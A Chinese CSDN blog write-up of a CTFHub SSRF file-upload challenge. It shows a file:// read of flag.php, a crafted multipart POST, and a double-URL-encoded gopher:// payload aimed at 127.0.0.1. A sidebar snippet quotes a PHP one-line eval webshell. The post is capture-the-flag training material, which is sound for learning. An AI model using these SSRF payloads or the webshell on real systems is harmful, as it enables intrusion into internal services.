CTFHub技能树 Web-SSRF 上传文件

最新推荐文章于 2024-07-24 21:30:59 发布
最新推荐文章于 2024-07-24 21:30:59 发布
阅读量1.9k 收藏 7
点赞数 5
分类专栏: CTFHub WEB Writeup 文章标签: CTFHub技能树 CTF writeup SSRF 上传文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/118464358
版权

CTFHub技能树 Web-SSRF 上传文件


hint:这次需要上传一个文件到flag.php了,祝你好运

启动环境,依然为空白页面,查看URL:

http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_

其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php
在这里插入图片描述
提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。
使用file协议读取flag.php的源码:

?url=file:///var/www/html/flag.php

发送请求,得到目标源码:

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

form表单中写入提交按钮:

<input type="submit" name="submit">

在这里插入图片描述

随意上传一张图片,得到如下提示:
在这里插入图片描述
只允许从本地访问,重新上传文件,并使用BurpSuite抓取数据包:
在这里插入图片描述
参照CTFHub技能树 Web-SSRF POST请求,构造POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 292
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1lYApMMA3NDrr2iY

------WebKitFormBoundary1lYApMMA3NDrr2iY
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

SSRF Upload
------WebKitFormBoundary1lYApMMA3NDrr2iY
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundary1lYApMMA3NDrr2iY--

与之前相同,将第一次URL编码后的数据中%0A替换为%0D%0A,并进行二次URL编码:
在这里插入图片描述

伪造如下请求数据:

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520292%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250A%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522test.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250ASSRF%2520Upload%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY--

构造Payload:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520292%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250A%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522test.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250ASSRF%2520Upload%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY--

发送数据包,得到flag:
在这里插入图片描述

Senimo_
关注
专栏目录
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1574
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7284
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB——web——文件上传
weixin_45664911的博客
09-22 667
无验证 根据题目“无验证”可知,对上传文件没有进行任何验证 上传一句话木马,再用蚁剑进行连接 <?php @eval($_POST['a'] ?> 其中post的值可以随意更改 在地址后面添加上传文件相对路径,密码是post的值 连接 ...
CTFHubssrf漏洞--之上传文件
最新发布
weixin_57240513的博客
07-24 277
第一步:打开环境 第二步:访问flag.php 第三步:没有提交按钮,所以打开检查器,编辑html代码 第四步:修改代码如下图 第五步:点击提交按钮,抓包提交数据包 第六步:将host后面改为127.0.0.1:80,将数据包发送到repeater 第七步:将乱码的中文删掉重新输入两个中文字 第八步:将数据包保存为txt文件 第九步:将保存的数据包代码进行第一次编码 第十步:将第一次编码后的数据包ctrl+f替换,将%0A替换为%0A%0D再进行
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 563
CTFHUB技能树SSRF、上传文件的通关教程
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 569
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4020
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
ctfhub web技能树
gh0stf1re的博客
08-30 621
ctfhub web技能树 前言 其实很多题之前已经做过了,但是感觉自己没有吃透吧,只是以做题为目的。所以打算重新做一下,加深一下印象,另外,把知识点也整理一下。 Web前置技能 HTTP协议 请求方式 这时我们采用的http方法是get方法,提示我们采用CTFHUB方法 方法1:利用burp更改请求方式 方法2:使用curl(curl是http神器) curl的用法指南——阮一峰 windows下有一个自带curl的终端神器——cmder,完整版还带有git,非常推荐,具体使用及配置可以参考这几篇
CTF-WEB入门DOC-2019版1
08-03
2. 靶场:如BUUOJ、南邮0xCTFCTF.show、CTFhub、BugKuCTF、攻防世界等,提供实践环境。 3. 学习平台:CTF-Wiki-Web、dalao们的博客、先知社区、freebuf、安全客等。 4. 书籍:《白帽子讲Web安全》、《Web安全攻防...
web安全】SSRF的各种利用方式
HBohan的博客
04-19 1878
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
ctfhub web-SSRF(服务器请求伪造) 文件上传
SinAlone的博客
06-30 414
提示:这次需要上传一个文件到flag.php了.祝你好运 使用file://伪协议查看flag.php的php源码 得知flag.php只接受来自127.0.0.1的访问 访问flag.php 观察到只有浏览文件没有提交文件,咱们打开f12自己给他加个提交。 然后选好要上传的文件成下图 文件随便是啥,咱就用个一句话木马 此时用burp抓包拦截请求,点击提交查询 得到如下包 将其中的Host内容改为 Host:127.0.0.1:80 之后将此包内容复制粘贴,
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2563
CTFhub ssrf 端口扫描&文件上传
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8800
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub文件上传
遇事不决冲冲冲
04-17 1380
MIME绕过 知识点 MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类,也就是我们抓包时常见的Content-Type。 常见的MIME类型,例如: 超文本
ctfhub -SSRF
weixin_55702959的博客
02-09 645
内网访问 SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ?url=127.0.0.1/flag.php 抓包 伪协议读取文件 https://blog.csdn.net/qq_39431542/article/details/89483887 php伪协议: File:// 访问本地文件系统 http:// 访问 H
CTF-Hub-文件上传
qq_60905276的博客
11-22 506
1.00截断 00截断通常用来绕过web软waf的白名单限制。 条件:php版本小于5.3.29 2.双写后缀绕过 用于只将文件后缀名,例如"php"字符串过滤的场合; 例如:上传时将Burpsuite截获的数据包中文件名【evil.php】改为【evil.pphphp】,那么过滤了第一个"php"字符串"后,开头的'p'和结尾的'hp'就组合又形成了【php】。 不过为什么老是报错呢? ...
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 3002
SSRF相关题目实战
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值